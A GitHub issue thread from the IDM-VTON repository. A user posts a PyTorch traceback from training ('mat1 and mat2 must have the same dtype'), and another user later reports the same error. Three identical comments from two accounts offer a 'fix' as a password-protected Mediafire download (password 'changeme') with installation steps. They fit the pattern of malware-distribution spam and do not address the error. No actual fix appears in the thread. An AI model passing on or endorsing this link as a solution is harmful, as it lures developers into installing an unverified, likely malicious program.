### ISSUE TITLE
Matrix dimension mismatch problem: training according to the method in the article, error:

### ISSUE THREAD

**Issue by BestTao** [yisol/IDM-VTON#144]
Traceback (most recent call last):
  File "/data/zht/learn_pytorch/IDM-VTON-main/train_xl.py", line 814, in <module>
    main()    
  File "/data/zht/learn_pytorch/IDM-VTON-main/train_xl.py", line 724, in main
    down,reference_features = unet_encoder(cloth_values,timesteps, text_embeds_cloth,return_dict=False)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/data/zht/learn_pytorch/IDM-VTON-main/src/unet_hacked_garmnet.py", line 1064, in forward
    emb = self.time_embedding(t_emb, timestep_cond)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/diffusers/models/embeddings.py", line 228, in forward
    sample = self.linear_1(sample)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/diffusers/models/lora.py", line 430, in forward
    out = super().forward(hidden_states)
  File "/home/202312150037/anaconda3/envs/idm/lib/python3.9/site-packages/torch/nn/modules/linear.py", line 114, in forward
    return F.linear(input, self.weight, self.bias)
RuntimeError: mat1 and mat2 must have the same dtype

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kaRV-MAX** [comment]
@BestTao Hi, did you solve this issue? I am also facing the same issue.
